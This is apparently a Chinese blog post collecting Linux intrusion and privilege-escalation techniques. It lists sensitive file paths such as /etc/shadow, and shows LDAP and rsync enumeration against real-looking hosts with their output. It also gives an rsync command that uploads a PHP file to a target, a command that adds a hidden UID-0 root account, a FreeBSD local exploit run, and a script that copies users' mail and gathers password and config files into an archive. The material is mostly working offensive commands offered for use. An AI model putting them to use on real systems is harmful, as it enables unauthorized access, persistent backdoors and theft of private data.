  • LINUX渗透与提权总结

    本文为 Linux 渗透与提权技巧总结篇,旨在收集各种 Linux 渗透技巧与提权方法,方便各位同学在日后的渗透测试中事半功倍。

    Linux 系统下的一些常见路径:

    001 /etc/passwd
    002  
    003 /etc/shadow
    004  
    005 /etc/fstab
    006  
    007 /etc/host.conf
    008  
    009 /etc/motd
    010  
    011 /etc/ld.so.conf
    012  
    013 /var/www/htdocs/index.php
    014  
    015 /var/www/conf/httpd.conf
    016  
    017 /var/www/htdocs/index.html
    018  
    019 /var/httpd/conf/php.ini
    020  
    021 /var/httpd/htdocs/index.php
    022  
    023 /var/httpd/conf/httpd.conf
    024  
    025 /var/httpd/htdocs/index.html
    026  
    027 /var/httpd/conf/php.ini
    028  
    029 /var/www/index.html
    030  
    031 /var/www/index.php
    032  
    033 /opt/www/conf/httpd.conf
    034  
    035 /opt/www/htdocs/index.php
    036  
    037 /opt/www/htdocs/index.html
    038  
    039 /usr/local/apache/htdocs/index.html
    040  
    041 /usr/local/apache/htdocs/index.php
    042  
    043 /usr/local/apache2/htdocs/index.html
    044  
    045 /usr/local/apache2/htdocs/index.php
    046  
    047 /usr/local/httpd2.2/htdocs/index.php
    048  
    049 /usr/local/httpd2.2/htdocs/index.html
    050  
    051 /tmp/apache/htdocs/index.html
    052  
    053 /tmp/apache/htdocs/index.php
    054  
    055 /etc/httpd/htdocs/index.php
    056  
    057 /etc/httpd/conf/httpd.conf
    058  
    059 /etc/httpd/htdocs/index.html
    060  
    061 /www/php/php.ini
    062  
    063 /www/php4/php.ini
    064  
    065 /www/php5/php.ini
    066  
    067 /www/conf/httpd.conf
    068  
    069 /www/htdocs/index.php
    070  
    071 /www/htdocs/index.html
    072  
    073 /usr/local/httpd/conf/httpd.conf
    074  
    075 /apache/apache/conf/httpd.conf
    076  
    077 /apache/apache2/conf/httpd.conf
    078  
    079 /etc/apache/apache.conf
    080  
    081 /etc/apache2/apache.conf
    082  
    083 /etc/apache/httpd.conf
    084  
    085 /etc/apache2/httpd.conf
    086  
    087 /etc/apache2/vhosts.d/00_default_vhost.conf
    088  
    089 /etc/apache2/sites-available/default
    090  
    091 /etc/phpmyadmin/config.inc.php
    092  
    093 /etc/mysql/my.cnf
    094  
    095 /etc/httpd/conf.d/php.conf
    096  
    097 /etc/httpd/conf.d/httpd.conf
    098  
    099 /etc/httpd/logs/error_log
    100  
    101 /etc/httpd/logs/error.log
    102  
    103 /etc/httpd/logs/access_log
    104  
    105 /etc/httpd/logs/access.log
    106  
    107 /home/apache/conf/httpd.conf
    108  
    109 /home/apache2/conf/httpd.conf
    110  
    111 /var/log/apache/error_log
    112  
    113 /var/log/apache/error.log
    114  
    115 /var/log/apache/access_log
    116  
    117 /var/log/apache/access.log
    118  
    119 /var/log/apache2/error_log
    120  
    121 /var/log/apache2/error.log
    122  
    123 /var/log/apache2/access_log
    124  
    125 /var/log/apache2/access.log
    126  
    127 /var/www/logs/error_log
    128  
    129 /var/www/logs/error.log
    130  
    131 /var/www/logs/access_log
    132  
    133 /var/www/logs/access.log
    134  
    135 /usr/local/apache/logs/error_log
    136  
    137 /usr/local/apache/logs/error.log
    138  
    139 /usr/local/apache/logs/access_log
    140  
    141 /usr/local/apache/logs/access.log
    142  
    143 /var/log/error_log
    144  
    145 /var/log/error.log
    146  
    147 /var/log/access_log
    148  
    149 /var/log/access.log
    150  
    151 /usr/local/apache/logs/access_logaccess_log.old
    152  
    153 /usr/local/apache/logs/error_logerror_log.old
    154  
    155 /etc/php.ini
    156  
    157 /bin/php.ini
    158  
    159 /etc/init.d/httpd
    160  
    161 /etc/init.d/mysql
    162  
    163 /etc/httpd/php.ini
    164  
    165 /usr/lib/php.ini
    166  
    167 /usr/lib/php/php.ini
    168  
    169 /usr/local/etc/php.ini
    170  
    171 /usr/local/lib/php.ini
    172  
    173 /usr/local/php/lib/php.ini
    174  
    175 /usr/local/php4/lib/php.ini
    176  
    177 /usr/local/php4/php.ini
    178  
    179 /usr/local/php4/lib/php.ini
    180  
    181 /usr/local/php5/lib/php.ini
    182  
    183 /usr/local/php5/etc/php.ini
    184  
    185 /usr/local/php5/php5.ini
    186  
    187 /usr/local/apache/conf/php.ini
    188  
    189 /usr/local/apache/conf/httpd.conf
    190  
    191 /usr/local/apache2/conf/httpd.conf
    192  
    193 /usr/local/apache2/conf/php.ini
    194  
    195 /etc/php4.4/fcgi/php.ini
    196  
    197 /etc/php4/apache/php.ini
    198  
    199 /etc/php4/apache2/php.ini
    200  
    201 /etc/php5/apache/php.ini
    202  
    203 /etc/php5/apache2/php.ini
    204  
    205 /etc/php/php.ini
    206  
    207 /etc/php/php4/php.ini
    208  
    209 /etc/php/apache/php.ini
    210  
    211 /etc/php/apache2/php.ini
    212  
    213 /web/conf/php.ini
    214  
    215 /usr/local/Zend/etc/php.ini
    216  
    217 /opt/xampp/etc/php.ini
    218  
    219 /var/local/www/conf/php.ini
    220  
    221 /var/local/www/conf/httpd.conf
    222  
    223 /etc/php/cgi/php.ini
    224  
    225 /etc/php4/cgi/php.ini
    226  
    227 /etc/php5/cgi/php.ini
    228  
    229 /php5/php.ini
    230  
    231 /php4/php.ini
    232  
    233 /php/php.ini
    234  
    235 /PHP/php.ini
    236  
    237 /apache/php/php.ini
    238  
    239 /xampp/apache/bin/php.ini
    240  
    241 /xampp/apache/conf/httpd.conf
    242  
    243 /NetServer/bin/stable/apache/php.ini
    244  
    245 /home2/bin/stable/apache/php.ini
    246  
    247 /home/bin/stable/apache/php.ini
    248  
    249 /var/log/mysql/mysql-bin.log
    250  
    251 /var/log/mysql.log
    252  
    253 /var/log/mysqlderror.log
    254  
    255 /var/log/mysql/mysql.log
    256  
    257 /var/log/mysql/mysql-slow.log
    258  
    259 /var/mysql.log
    260  
    261 /var/lib/mysql/my.cnf
    262  
    263 /usr/local/mysql/my.cnf
    264  
    265 /usr/local/mysql/bin/mysql
    266  
    267 /etc/mysql/my.cnf
    268  
    269 /etc/my.cnf
    270  
    271 /usr/local/cpanel/logs
    272  
    273 /usr/local/cpanel/logs/stats_log
    274  
    275 /usr/local/cpanel/logs/access_log
    276  
    277 /usr/local/cpanel/logs/error_log
    278  
    279 /usr/local/cpanel/logs/license_log
    280  
    281 /usr/local/cpanel/logs/login_log
    282  
    283 /usr/local/cpanel/logs/stats_log
    284  
    285 /usr/local/share/examples/php4/php.ini
    286  
    287 /usr/local/share/examples/php/php.ini
    288  
    289 /usr/local/tomcat5527/bin/version.sh
    290  
    291 /usr/share/tomcat6/bin/startup.sh
    292  
    293 /usr/tomcat6/bin/startup.sh

     Linux 相关提权渗透技巧总结,一、LDAP 渗透技巧:

    1 1.cat /etc/nsswitch

    查看密码登录策略,可以看到使用的是 file ldap 模式。

    1 2.less /etc/ldap.conf
    2  
    3 base ou=People,dc=unix-center,dc=net

    从 base 一行中找到 ou 与 dc 的设置。

    3.查找管理员信息

    匿名方式

    1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    有密码形式

    1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    4.查找10条用户记录

    1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    实战:

    1 1.cat /etc/nsswitch

    查看密码登录策略,可以看到使用的是 file ldap 模式。

    1 2.less /etc/ldap.conf
    2  
    3 base ou=People,dc=unix-center,dc=net

    从 base 一行中找到 ou 与 dc 的设置。

    3.查找管理员信息

    匿名方式

    1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    有密码形式

    1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    4.查找10条用户记录

    1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    渗透实战:

    1.返回所有的属性

    01 ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
    02  
    03 version: 1
    04  
    05 dn: dc=ruc,dc=edu,dc=cn
    06  
    07 dc: ruc
    08  
    09 objectClass: domain
    10  
    11 dn: uid=manager,dc=ruc,dc=edu,dc=cn
    12  
    13 uid: manager
    14  
    15 objectClass: inetOrgPerson
    16  
    17 objectClass: organizationalPerson
    18  
    19 objectClass: person
    20  
    21 objectClass: top
    22  
    23 sn: manager
    24  
    25 cn: manager
    26  
    27 dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
    28  
    29 uid: superadmin
    30  
    31 objectClass: inetOrgPerson
    32  
    33 objectClass: organizationalPerson
    34  
    35 objectClass: person
    36  
    37 objectClass: top
    38  
    39 sn: superadmin
    40  
    41 cn: superadmin
    42  
    43 dn: uid=admin,dc=ruc,dc=edu,dc=cn
    44  
    45 uid: admin
    46  
    47 objectClass: inetOrgPerson
    48  
    49 objectClass: organizationalPerson
    50  
    51 objectClass: person
    52  
    53 objectClass: top
    54  
    55 sn: admin
    56  
    57 cn: admin
    58  
    59 dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
    60  
    61 uid: dcp_anonymous
    62  
    63 objectClass: top
    64  
    65 objectClass: person
    66  
    67 objectClass: organizationalPerson
    68  
    69 objectClass: inetOrgPerson
    70  
    71 sn: dcp_anonymous
    72  
    73 cn: dcp_anonymous
    2.查看基类
    1 bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

    3.查找

    001 bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
    002  
    003 version: 1
    004  
    005 dn:
    006  
    007 objectClass: top
    008  
    009 namingContexts: dc=ruc,dc=edu,dc=cn
    010  
    011 supportedExtension: 2.16.840.1.113730.3.5.7
    012  
    013 supportedExtension: 2.16.840.1.113730.3.5.8
    014  
    015 supportedExtension: 1.3.6.1.4.1.4203.1.11.1
    016  
    017 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
    018  
    019 supportedExtension: 2.16.840.1.113730.3.5.3
    020  
    021 supportedExtension: 2.16.840.1.113730.3.5.5
    022  
    023 supportedExtension: 2.16.840.1.113730.3.5.6
    024  
    025 supportedExtension: 2.16.840.1.113730.3.5.4
    026  
    027 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
    028  
    029 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
    030  
    031 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
    032  
    033 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
    034  
    035 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
    036  
    037 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
    038  
    039 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
    040  
    041 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
    042  
    043 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
    044  
    045 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
    046  
    047 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
    048  
    049 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
    050  
    051 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
    052  
    053 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
    054  
    055 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
    056  
    057 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
    058  
    059 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
    060  
    061 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
    062  
    063 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
    064  
    065 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
    066  
    067 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
    068  
    069 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
    070  
    071 supportedExtension: 1.3.6.1.4.1.1466.20037
    072  
    073 supportedExtension: 1.3.6.1.4.1.4203.1.11.3
    074  
    075 supportedControl: 2.16.840.1.113730.3.4.2
    076  
    077 supportedControl: 2.16.840.1.113730.3.4.3
    078  
    079 supportedControl: 2.16.840.1.113730.3.4.4
    080  
    081 supportedControl: 2.16.840.1.113730.3.4.5
    082  
    083 supportedControl: 1.2.840.113556.1.4.473
    084  
    085 supportedControl: 2.16.840.1.113730.3.4.9
    086  
    087 supportedControl: 2.16.840.1.113730.3.4.16
    088  
    089 supportedControl: 2.16.840.1.113730.3.4.15
    090  
    091 supportedControl: 2.16.840.1.113730.3.4.17
    092  
    093 supportedControl: 2.16.840.1.113730.3.4.19
    094  
    095 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
    096  
    097 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
    098  
    099 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
    100  
    101 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    102  
    103 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    104  
    105 supportedControl: 2.16.840.1.113730.3.4.14
    106  
    107 supportedControl: 1.3.6.1.4.1.1466.29539.12
    108  
    109 supportedControl: 2.16.840.1.113730.3.4.12
    110  
    111 supportedControl: 2.16.840.1.113730.3.4.18
    112  
    113 supportedControl: 2.16.840.1.113730.3.4.13
    114  
    115 supportedSASLMechanisms: EXTERNAL
    116  
    117 supportedSASLMechanisms: DIGEST-MD5
    118  
    119 supportedLDAPVersion: 2
    120  
    121 supportedLDAPVersion: 3
    122  
    123 vendorName: Sun Microsystems, Inc.
    124  
    125 vendorVersion: Sun-Java(tm)-System-Directory/6.2
    126  
    127 dataversion: 020090516011411
    128  
    129 netscapemdsuffix: cn=ldap://dc=webA:389
    130  
    131 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
    132  
    133 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
    134  
    135 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
    136  
    137 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
    138  
    139 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
    140  
    141 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
    142  
    143 supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
    144  
    145 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
    146  
    147 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
    148  
    149 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
    150  
    151 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
    152  
    153 supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
    154  
    155 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
    156  
    157 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
    158  
    159 supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
    160  
    161 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
    162  
    163 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
    164  
    165 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
    166  
    167 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
    168  
    169 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
    170  
    171 supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
    172  
    173 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
    174  
    175 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
    176  
    177 supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    178  
    179 supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
    180  
    181 supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
    182  
    183 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
    184  
    185 supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
    186  
    187 supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
    188  
    189 supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
    190  
    191 supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
    192  
    193 supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
    194  
    195 supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
    196  
    197 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
    198  
    199 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
    200  
    201 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
    202  
    203 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
    204  
    205 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
    206  
    207 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
    208  
    209 supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
    210  
    211 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
    212  
    213 supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
    214  
    215 supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
    216  
    217 supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
    218  
    219 supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
    220  
    221 supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
    222  
    223 supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
    224  
    225 supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
    226  
    227 supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
     

     Linux 相关提权渗透技巧总结,二、NFS 渗透技巧:

    列举IP:

    1 showmount -e ip

     Linux 相关提权渗透技巧总结,三、rsync 渗透技巧:

    1.查看rsync服务器上的列表:

    01 rsync 210.51.X.X::
    02  
    03 finance
    04  
    05 img_finance
    06  
    07 auto
    08  
    09 img_auto
    10  
    11 html_cms
    12  
    13 img_cms
    14  
    15 ent_cms
    16  
    17 ent_img
    18  
    19 ceshi
    20  
    21 res_img
    22  
    23 res_img_c2
    24  
    25 chip
    26  
    27 chip_c2
    28  
    29 ent_icms
    30  
    31 games
    32  
    33 gamesimg
    34  
    35 media
    36  
    37 mediaimg
    38  
    39 fashion
    40  
    41 res-fashion
    42  
    43 res-fo
    44  
    45 taobao-home
    46  
    47 res-taobao-home
    48  
    49 house
    50  
    51 res-house
    52  
    53 res-home
    54  
    55 res-edu
    56  
    57 res-ent
    58  
    59 res-labs
    60  
    61 res-news
    62  
    63 res-phtv
    64  
    65 res-media
    66  
    67 home
    68  
    69 edu
    70  
    71 news
    72  
    73 res-book

    查看相应的下级目录(注意:目录名后面一定要加上 /):

    1 rsync 210.51.X.X::htdocs_app/
    2  
    3 rsync 210.51.X.X::auto/
    4  
    5 rsync 210.51.X.X::edu/

    2.下载rsync服务器上的配置文件

    1 rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

    3.向上更新rsync文件(成功上传,不会覆盖)

    1 rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
    2  

     Linux 相关提权渗透技巧总结,四、squid 渗透技巧:

    1 nc -vv 91ri.org 80
    2  
    3 GET HTTP://www.sina.com / HTTP/1.0
    4  
    5 GET HTTP://WWW.sina.com:22 / HTTP/1.0

     Linux 相关提权渗透技巧总结,五、SSH 端口转发:

    1 ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

     Linux 相关提权渗透技巧总结,六、Joomla 渗透小技巧:

    确定版本:

    1 index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

    重新设置密码:

    1 index.php?option=com_user&view=reset&layout=confirm

     Linux 相关提权渗透技巧总结,七、Linux 添加 UID 为 0 的 root 用户:

    1 useradd -o -u 0 nothack

     Linux 相关提权渗透技巧总结,八、FreeBSD 本地提权:

    01 [argp@julius ~]$ uname -rsi
    02  
    03 * freebsd 7.3-RELEASE GENERIC
    04  
    05 * [argp@julius ~]$ sysctl vfs.usermount
    06  
    07 * vfs.usermount: 1
    08  
    09 * [argp@julius ~]$ id
    10  
    11 * uid=1001(argp) gid=1001(argp) groups=1001(argp)
    12  
    13 * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
    14  
    15 * [argp@julius ~]$ ./nfs_mount_ex
    16  
    17 *
    18  
    19 calling nmount()

     tar 文件夹打包:

    1、tar打包:

    1 tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*
    2  
    3 alzip打包(韩国) alzip -a D:WEB d:web*.rar

    {

    注:

    关于 tar 的打包方式:Linux 并不以扩展名来决定文件类型。

    若需要压缩:用 tar -ztf *.tar.gz 查看压缩包内容,用 tar -zxf *.tar.gz 解压。

    因此,使用下面这条命令更合适:

    1 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*

    }

    系统信息收集:

    01 for linux:
    02  
    03 #!/bin/bash
    04  
    05 echo #######geting sysinfo####
    06  
    07 echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
    08  
    09 echo #######basic infomation##
    10  
    11 cat /proc/meminfo
    12  
    13 echo
    14  
    15 cat /proc/cpuinfo
    16  
    17 echo
    18  
    19 rpm -qa 2>/dev/null
    20  
    21 ######stole the mail......######
    22  
    23 cp -a /var/mail /tmp/getmail 2>/dev/null
    24  
    25 echo 'u'r id is' `id`
    26  
    27 echo ###atq&crontab#####
    28  
    29 atq
    30  
    31 crontab -l
    32  
    33 echo #####about var#####
    34  
    35 set
    36  
    37 echo #####about network###
    38  
    39 ####this is then point in pentest,but i am a new bird,so u need to add some in it
    40  
    41 cat /etc/hosts
    42  
    43 hostname
    44  
    45 ipconfig -a
    46  
    47 arp -v
    48  
    49 echo ########user####
    50  
    51 cat /etc/passwd|grep -i sh
    52  
    53 echo ######service####
    54  
    55 chkconfig --list
    56  
    57 for i in {oracle,mysql,tomcat,samba,apache,ftp}
    58  
    59 cat /etc/passwd|grep -i $i
    60  
    61 done
    62  
    63 locate passwd >/tmp/password 2>/dev/null
    64  
    65 sleep 5
    66  
    67 locate password >>/tmp/password 2>/dev/null
    68  
    69 sleep 5
    70  
    71 locate conf >/tmp/sysconfig 2>dev/null
    72  
    73 sleep 5
    74  
    75 locate config >>/tmp/sysconfig 2>/dev/null
    76  
    77 sleep 5
    78  
    79 ###maybe can use "tree /"###
    80  
    81 echo ##packing up#########
    82  
    83 tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
    84  
    85 rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
     
  • 原文地址:https://www.cnblogs.com/milantgh/p/3601783.html